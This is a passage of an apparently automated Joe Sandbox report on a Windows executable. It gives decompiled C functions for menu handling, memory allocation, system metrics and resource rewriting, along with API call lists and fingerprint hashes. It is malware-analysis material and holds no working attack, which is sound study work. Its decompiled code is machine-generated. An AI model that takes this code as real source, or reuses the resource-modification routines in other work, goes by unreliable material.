                                                                                                                                                                                                                            								_t42 = _t43 + _t27;
                                                                                                                                                                                                                            								E00404CCC( &_v12, _v8, 0x4349ac);
                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404CCC( &_v12, 0x4349ac, _v8);
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
                                                                                                                                                                                                                            						_t34 = E00404E80(_v12);
                                                                                                                                                                                                                            						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t50);
                                                                                                                                                                                                                            				 *[fs:eax] = _t50;
                                                                                                                                                                                                                            				_push(0x43499a);
                                                                                                                                                                                                                            				return E004049C0( &_v12);
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                                                                                                                                                                                            • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            				struct HMENU__* _t64;
                                                                                                                                                                                                                            				struct HMENU__* _t70;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				void* _t116;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t109 = __edi;
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_t113 = __edx;
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				_push(_t116);
                                                                                                                                                                                                                            				_push(0x454c0a);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                            					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                                                                                                                                                                            						E0044E3BC(_t39, 0, _t109, 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                                                                                                                                                                            						_t113 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                                                                                                                                                                            					if(_t113 != 0) {
                                                                                                                                                                                                                            						E00421C0C(_t113, _t92);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                                                                                                                                                                            						_t41 = E00441A08(_t92);
                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                            						if(_t41 != 0) {
                                                                                                                                                                                                                            							SetMenu(E00441704(_t92), 0); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L30;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                                                                                                                                                                            							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                                                                                                                                                                            								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                                                                                                                                                                            									_t54 = E00441A08(_t92);
                                                                                                                                                                                                                            									__eflags = _t54;
                                                                                                                                                                                                                            									if(_t54 != 0) {
                                                                                                                                                                                                                            										SetMenu(E00441704(_t92), 0);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                            							if(E00441A08(_t92) != 0) {
                                                                                                                                                                                                                            								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                                                                                                                                                            								_t110 = _t61;
                                                                                                                                                                                                                            								_t64 = GetMenu(E00441704(_t92));
                                                                                                                                                                                                                            								_t138 = _t61 - _t64;
                                                                                                                                                                                                                            								if(_t61 != _t64) {
                                                                                                                                                                                                                            									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                                                                                                                                                            									SetMenu(E00441704(_t92), _t70);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L30:
                                                                                                                                                                                                                            							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                                                                                                                                                                            								E00455B08(_t92, 1);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0045497C(_t92);
                                                                                                                                                                                                                            							_pop(_t98);
                                                                                                                                                                                                                            							 *[fs:eax] = _t98;
                                                                                                                                                                                                                            							_push(0x454c11);
                                                                                                                                                                                                                            							return E004049C0( &_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t77 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				_t79 = E00458274(_t77) - 1;
                                                                                                                                                                                                                            				if(_t79 >= 0) {
                                                                                                                                                                                                                            					_v8 = _t79 + 1;
                                                                                                                                                                                                                            					_t111 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t81 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
                                                                                                                                                                                                                            							_t83 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            							if(_t92 != E00458260(_t83, _t111)) {
                                                                                                                                                                                                                            								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                                                                                                                                                                            								_v12 = 0xb;
                                                                                                                                                                                                                            								_t87 =  *0x49d8b4; // 0x423118
                                                                                                                                                                                                                            								E00406A70(_t87,  &_v20);
                                                                                                                                                                                                                            								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                                                                                                                                                                            								E00404378();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t111 = _t111 + 1;
                                                                                                                                                                                                                            						_t10 =  &_v8;
                                                                                                                                                                                                                            						 *_t10 = _v8 - 1;
                                                                                                                                                                                                                            					} while ( *_t10 != 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            0x00454ab9
                                                                                                                                                                                                                            0x00454ac8
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454a9f
                                                                                                                                                                                                                            0x00454ad2
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454a7d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenu.USER32(00000000), ref: 00454B68
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$LoadString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3688185913-0
                                                                                                                                                                                                                            • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                                                                                                                                                                                            • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                            • String ID: 7
                                                                                                                                                                                                                            • API String ID: 2227675388-1331172448
                                                                                                                                                                                                                            • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E0042C5E4(int _a4) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t2;
                                                                                                                                                                                                                            				signed int _t3;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t8 = _a4;
                                                                                                                                                                                                                            				if( *0x49e928 == 0) {
                                                                                                                                                                                                                            					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
                                                                                                                                                                                                                            					_t7 =  *0x49e900(_t8); // executed
                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t3 = _t2 | 0xffffffff;
                                                                                                                                                                                                                            				_t12 = _t8 + 0xffffffb4 - 2;
                                                                                                                                                                                                                            				__eflags = _t12;
                                                                                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                                                                                            					_t3 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						_t8 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t13 = _t12 - 1;
                                                                                                                                                                                                                            						__eflags = _t13;
                                                                                                                                                                                                                            						if(_t13 == 0) {
                                                                                                                                                                                                                            							_t8 = 1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t13 - 0xffffffffffffffff;
                                                                                                                                                                                                                            							if(_t13 - 0xffffffffffffffff < 0) {
                                                                                                                                                                                                                            								_t3 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags = _t3 - 0xffffffff;
                                                                                                                                                                                                                            				if(_t3 != 0xffffffff) {
                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return GetSystemMetrics(_t8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            0x0042c63b
                                                                                                                                                                                                                            0x0042c626
                                                                                                                                                                                                                            0x0042c627
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c624
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c640
                                                                                                                                                                                                                            0x0042c643
                                                                                                                                                                                                                            0x0042c64d
                                                                                                                                                                                                                            0x0042c645
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c646

APIs
• GetSystemMetrics.USER32 ref: 0042C646
  • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
• KiUserCallbackDispatcher.NTDLL ref: 0042C60C
Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: AddressCallbackDispatcherMetricsProcSystemUser
• String ID: GetSystemMetrics
• API String ID: 54681038-96882338
• Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
• Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
• Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
• Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 63%
E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
	intOrPtr _v8;
	char _v12;
	char _v13;
	void* _v20;
	intOrPtr _v24;
	void* _t33;
	int _t45;
	int _t47;
	char _t48;
	void* _t53;
	intOrPtr _t61;
	intOrPtr _t63;
	void* _t67;
	void* _t68;
	intOrPtr _t69;

	_t67 = _t68;
	_t69 = _t68 + 0xffffffec;
	_v12 = __ecx;
	_v8 = __eax;
	E00404E70(_v8);
	E00404E70(_v12);
	_push(_t67);
	_push(0x474bff);
	_push( *[fs:eax]);
	 *[fs:eax] = _t69;
	_v24 = E00409A7C(_v8);
	E00409A90(_v8, 0x80);
	_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
	_t53 = _t33;
	_v13 = _t53 != 0;
	if(_v13 == 0) {
		E00409A90(_v8, _v24);
		_pop(_t61);
		 *[fs:eax] = _t61;
		_push(0x474c06);
		return E004049E4( &_v12, 2);
	} else {
		_push(_t67);
		_push(0x474bd2);
		_push( *[fs:eax]);
		 *[fs:eax] = _t69;
		_v20 = E0040275C(0);
		_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
		asm("sbb eax, eax");
		_v13 = _t45 + 1;
		_t47 = EndUpdateResourceA(_t53, 0); // executed
		if(_t47 == 0 || _v13 == 0) {
			_t48 = 0;
		} else {
			_t48 = 1;
		}
		_v13 = _t48;
		_pop(_t63);
		 *[fs:eax] = _t63;
		_push(0x474bd9);
		return E0040277C(_v20);
	}
}


















                                                                                                                                                                                                                            0x00474bb3
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb9
                                                                                                                                                                                                                            0x00474bbe
                                                                                                                                                                                                                            0x00474bc1
                                                                                                                                                                                                                            0x00474bc4
                                                                                                                                                                                                                            0x00474bd1
                                                                                                                                                                                                                            0x00474bd1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00474B93
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3622334292-0
                                                                                                                                                                                                                            • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                                                                                                                                                                                            • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015B4(void* __eax, void** __edx) {
                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                            				void** _t8;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				long _t14;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t8 = __edx;
                                                                                                                                                                                                                            				if(__eax >= 0x100000) {
                                                                                                                                                                                                                            					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t14 = 0x100000;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t8[1] = _t14;
                                                                                                                                                                                                                            				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                                                                                                                            				_t11 = _t3;
                                                                                                                                                                                                                            				 *_t8 = _t11;
                                                                                                                                                                                                                            				if(_t11 != 0) {
                                                                                                                                                                                                                            					_t3 = E00401468(0x49e5ec, _t8);
                                                                                                                                                                                                                            					if(_t3 == 0) {
                                                                                                                                                                                                                            						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                                                                                                                            						 *_t8 = 0;
                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t3;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 2087232378-1966777607
                                                                                                                                                                                                                            • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                                                            • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				char _v14;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t54;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t130;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t133;
                                                                                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                                                                            				intOrPtr _t153;
                                                                                                                                                                                                                            				intOrPtr _t157;
                                                                                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t159 = __esi;
                                                                                                                                                                                                                            				_t158 = __edi;
                                                                                                                                                                                                                            				_t161 = _t162;
                                                                                                                                                                                                                            				_t120 = 9;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t120 = _t120 - 1;
                                                                                                                                                                                                                            				} while (_t120 != 0);
                                                                                                                                                                                                                            				_t1 =  &_v8;
                                                                                                                                                                                                                            				 *_t1 = _t120;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v13 =  *_t1;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t161);
                                                                                                                                                                                                                            				_push(0x477dae);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t162;
                                                                                                                                                                                                                            				_t118 = E00404E80(_v8);
                                                                                                                                                                                                                            				_t54 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				if(FindResourceA(_t54, _t53, 0xa) != 0) {
                                                                                                                                                                                                                            					_v14 = 1;
                                                                                                                                                                                                                            					E00409F48( &_v28);
